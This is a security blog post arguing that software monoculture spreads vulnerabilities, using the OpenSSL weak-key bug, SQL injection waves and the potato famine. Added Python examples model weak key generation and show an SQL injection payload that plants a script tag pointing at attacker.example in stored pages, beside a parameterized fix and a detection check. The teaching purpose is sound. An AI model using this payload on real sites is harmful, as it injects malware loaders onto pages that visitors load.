
Software's Meta-Vulnerability

Two recent news items point to a meta-vulnerability in software: lack of diversity. The weak keys generated by a flawed OpenSSL library and the recent upswing in SQL injection attacks both show how a single vulnerability in one piece of code (or a small set of closely related vulnerabilities) can have far-reaching impact. That's why Bruce Schneier, who is not known for hyperbole, would say "this is a big deal" of the OpenSSL weak key bug.

I discussed the OpenSSL bug in an earlier post. There I argued that complexity in software is a fundamental problem and that we can't address it simply by continuing to do what we do now, only better; that helps, but it doesn't solve the underlying problem. I think the underlying problem is unsolvable, and we need more emphasis on recoverability. Now I want to argue that lack of diversity in software is another fundamental problem that isn't addressed by our usual practices, like code reviews and vulnerability scans.
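To show why one defect in one widely shared library can leave keys weak across every deployment that used it, here is an added example; it is not code from this post or from OpenSSL. It models the kind of failure with a deliberately simplified generator whose only varying input is a process-ID-like number, so the set of keys it can ever produce is small enough to list. The seed format, the SHA-256 derivation, PID_MAX and the function names are assumptions made for the model. It also runs the attacker's side (precompute every reachable key) and the defender's side (check a key against that list), which is the idea behind the weak-key blacklists published after the real bug.

```python
"""Low-entropy key generation as a model of the OpenSSL weak-key bug.

Added example for this post, not code from the original or from OpenSSL.
The generator below is deliberately simplified: the only input that varies
between runs is a process-ID-like value, so every key it can ever emit is
enumerable. The seed format, the derivation (SHA-256) and PID_MAX are
assumptions chosen for the model.
"""
import hashlib
import os
from typing import Dict, Optional

PID_MAX = 32768   # assumed PID range for the model: seeds are 1..32767
KEY_BYTES = 16    # 128-bit keys; the weakness is the seed space, not key length


def weak_keygen(pid: int, key_bytes: int = KEY_BYTES) -> bytes:
    """Constructed weak generator: the key is a pure function of the PID.

    No other entropy is mixed in, so two processes with the same PID on any
    machine get the same key, and every reachable key can be precomputed.
    """
    seed = pid.to_bytes(2, "big")
    return hashlib.sha256(b"weak-seed:" + seed).digest()[:key_bytes]


def strong_keygen(key_bytes: int = KEY_BYTES) -> bytes:
    """The fix: draw key material from the OS CSPRNG instead of a tiny seed."""
    return os.urandom(key_bytes)


def enumerate_weak_keys(key_bytes: int = KEY_BYTES) -> Dict[bytes, int]:
    """Attacker's precomputation: every key the weak generator can emit,
    mapped back to the seed that produced it."""
    return {weak_keygen(pid, key_bytes): pid for pid in range(1, PID_MAX)}


def recover_seed(key: bytes, table: Dict[bytes, int]) -> Optional[int]:
    """Given an observed key, return the seed behind it (None if not weak)."""
    return table.get(key)


def is_weak(key: bytes, table: Dict[bytes, int]) -> bool:
    """Defender's check, in the spirit of a weak-key blacklist: the reachable
    set is small enough to be listed exhaustively and looked up."""
    return key in table


if __name__ == "__main__":
    table = enumerate_weak_keys()
    print(f"weak generator can only ever produce {len(table)} distinct keys")
    observed = weak_keygen(4242)   # a "victim" key generated with pid 4242
    print("recovered seed:", recover_seed(observed, table))
    print("os.urandom key flagged weak?", is_weak(strong_keygen(), table))
```

Run it and the table holds 32,767 entries, the entire universe of keys this generator can produce; recovering the seed from an observed key is a dictionary lookup, not a search, and the same lookup is what lets a defender flag a key as weak without knowing anything about the system that made it.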

The OpenSSL weak keys bug is a big deal because the code is so widely used: one defect in one library meant weak keys on every system that generated them with it. Vulnerable database-backed applications are used in so many Web sites that attackers are now automating SQL injection attacks, using Google searches to find their prey. From SearchSecurity:

SQL injection has come back into vogue with attackers for a number of reasons, particularly the ease with which it can be automated. But it's also a maddeningly simple attack to execute, with a broad range of potential targets, making it appealing to both the low-level script kiddy as well as the pro who is looking for a big score.

"There's no commonality among these sites. They're just sites that have a programming mistake on them and these guys have picked the broadest attack surface possible, and that's where the SQL injection comes in," [Joe] Stewart [senior security researcher with SecureWorks] said.
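The "programming mistake" Stewart refers to is usually a query built by pasting user input straight into SQL text. The following added example (not code from this post, from SearchSecurity, or from the attack they describe) simulates a database-backed page that fetches an article by the `id` query parameter, once with string concatenation and once with a bound parameter, and sends the same crafted input through both. The schema, the article rows, the attacker host and the payload are constructed; the small `run_batch` helper stands in for a database driver that executes several `;`-separated statements in one call, which is an assumption of the model (Python's own sqlite3 `execute` refuses more than one). The payload appends a script tag to every stored article, the pattern that produces the "visitors are forced to download malicious JavaScript" outcome quoted later in the post.

```python
"""SQL injection: the programming mistake beside its fix.

Added example, not code from the original post, from SearchSecurity, or from
the attack wave they describe. Schema, rows, attacker host and payload are all
constructed for the demonstration.
"""
import sqlite3
from typing import List, Tuple

# Constructed attacker resource; attacker.example is a placeholder host.
ATTACKER_SCRIPT = '<script src="http://attacker.example/x.js"></script>'

# Crafted value of the "id" query parameter: close the intended SELECT,
# append an UPDATE that tags every article, comment out anything that follows.
PAYLOAD = "1; UPDATE articles SET body = body || '" + ATTACKER_SCRIPT + "' --"


def make_db() -> sqlite3.Connection:
    """Constructed sample site: a few articles in an in-memory database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT);"
        "INSERT INTO articles VALUES (1, 'Welcome', '<p>Hello</p>');"
        "INSERT INTO articles VALUES (2, 'News', '<p>Update</p>');"
    )
    return conn


def run_batch(conn: sqlite3.Connection, sql: str) -> List[Tuple]:
    """Stand-in (an assumption of the model) for a driver that runs several
    ';'-separated statements in one call and returns the rows of the last
    SELECT. sqlite3's execute() itself refuses more than one statement."""
    rows: List[Tuple] = []
    for stmt in sql.split(";"):
        stmt = stmt.strip()
        if not stmt:
            continue
        cur = conn.execute(stmt)
        if cur.description is not None:   # this statement produced a result set
            rows = cur.fetchall()
    return rows


def lookup_vulnerable(conn: sqlite3.Connection, article_id: str) -> List[Tuple]:
    """The mistake: untrusted input pasted into the statement text."""
    sql = "SELECT title, body FROM articles WHERE id = " + article_id
    return run_batch(conn, sql)


def lookup_safe(conn: sqlite3.Connection, article_id: str) -> List[Tuple]:
    """The fix: the statement text is fixed and the value travels as a bound
    parameter, so the payload is just a string that matches no id. Checking
    that article_id parses as an integer first would be a second layer."""
    cur = conn.execute("SELECT title, body FROM articles WHERE id = ?", (article_id,))
    return cur.fetchall()


def find_injected_scripts(conn: sqlite3.Connection) -> List[int]:
    """Defender's check after an injection wave: which stored rows now carry
    a script tag the site never wrote?"""
    cur = conn.execute("SELECT id FROM articles WHERE body LIKE '%<script%' ORDER BY id")
    return [row[0] for row in cur.fetchall()]


if __name__ == "__main__":
    site = make_db()
    lookup_vulnerable(site, PAYLOAD)
    print("rows tagged via the vulnerable lookup:", find_injected_scripts(site))
    site = make_db()
    print("safe lookup returns for the same input:", lookup_safe(site, PAYLOAD))
    print("rows tagged via the safe lookup:", find_injected_scripts(site))
```

The attacker never needs to know anything about the site beyond the fact that a parameter reaches SQL unescaped, which is why the attack scales to whatever Google turns up; the hardened lookup never changes the statement text, so the same input is merely a lookup that returns nothing.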

Lack of diversity has wreaked havoc in biology as well. Take the Irish Potato Famine, which has a number of parallels to how we develop and use software.

First, there is little variation. With software, we simply copy source code and recompile, or just copy binaries. Something analogous is at work with potatoes, from About Biodiversity:

Potatoes do not easily grow from seed, as do many other foods. They reproduce from enlarged underground root parts called tubers that are growing on existing plants. Potatoes are, in other words, clones of their mother plants.

And while in principle there could be a lot of diversity in code, the economics of software development drive code reuse. The same problem emerged in Ireland in the 19th century:

But the potatoes that were growing in Ireland and Europe in the mid-1840s represented a very limited number of varieties. They lacked resistance to a fungus named Phytophthora infestans. The result was a terrible famine in Ireland, where so much agriculture depended on a single crop.

And finally, there are derived consequences:

The starving farm families were also forced to eat the rotten produce, which sickened them. Cholera and typhus, both deadly diseases, joined with starvation to kill an estimated 1 million people.

Now we have weak encryption keys in wide use and vulnerable database applications that expose us to other kinds of attack. Again from SearchSecurity:

The result is that visitors to the site will then be forced to download a piece of malicious JavaScript code from another site. That code directs the user to a third site, where more malware is hosted, likely copies of Asprox or Danmec, Stewart says.

Lack of diversity is like complexity: we can't get rid of it with our usual set of tools. It's a product of how we use the software we build. Since we can't get rid of it, we need to figure out better ways to live with it. Ireland recovered and is doing well in spite of emerging economic challenges, so there is historical precedent for some optimism.


Dan Sullivan's Bio:

Dan Sullivan is a systems architect with 20 years of IT experience that includes engagements in enterprise security, application design, and systems architecture. His experience includes a broad range of industries, including financial services, manufacturing, government, retail, gas and oil production, power generation, and education. Dan’s security-related project work has ranged from requirements analysis for enterprise information security to designing and implementing security for database applications and enterprise portals. Dan has written about information security and other enterprise information management topics for Business Security Advisor, DM Review, Intelligent Enterprise, and E-Business Advisor. You can contact Dan at: dan_sullivan@realtimepublishers.net